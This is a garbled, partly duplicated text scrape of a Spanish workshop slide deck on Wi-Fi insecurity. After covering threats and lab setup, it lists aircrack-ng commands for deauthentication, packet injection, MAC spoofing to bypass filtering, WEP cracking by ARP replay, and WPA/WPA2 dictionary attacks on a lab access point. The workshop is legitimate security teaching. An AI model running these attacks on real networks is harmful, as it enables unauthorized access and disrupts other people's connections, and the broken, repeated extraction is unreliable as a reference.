Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 8: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894

Amenazas

Password cracking

Man in the middle

Exploits

Denegacioacuten de servicio

Escalamiento de privilegios

Hacking de Centrales Telefoacutenicas

Keylogging Port scanning

Puertos vulnerables abiertos

Servicios de log inexistentes o que no son revisados

Desactualizacioacuten

Backups inexistentes

Uacuteltimos parches no instalados

Violacioacuten de la privacidad de los empleados

Destruccioacuten de equipamiento

Desastres naturales

Usuarios internos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994

Maacutes Amenazas

Captura de PC desde el exteriorViolacioacuten de contrasentildeas

Interrupcioacuten de los servicios

VirusMails anoacutenimos con agresiones

Incumplimiento de leyes y regulaciones

Robo o extraviacuteo de notebooks palms

Robo de informacioacuten

Destruccioacuten de soportes documentales

Acceso clandestino a redes

Intercepcioacuten de comunicaciones voz ywireless

Programas ldquobomba troyanosrdquo

Acceso indebido a documentos impresos

Agujeros de seguridad de redes conectadas

Falsificacioacuten de informacioacuten paraterceros

Indisponibilidad de informacioacuten clave

Spamming

Ingenieriacute a social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094

Vulnerabilidad

bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194

Vulnerabilidad

bull httpwwwsecurityfocuscom

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294

Analogiacutea de Seguridad

Acepto el riesgo

Minimizo el riesgo

Transfiero el riesgo

Amenaza

Vulnerabilidad

Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394

Conexioacuten a Medios Alaacutembricos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494

Conexioacuten a Redes inalaacutembricas

bull WiFi (80211x)bull 80211abull 80211bbull

80211gbull 80211n

bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 9: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994

Maacutes Amenazas

Captura de PC desde el exteriorViolacioacuten de contrasentildeas

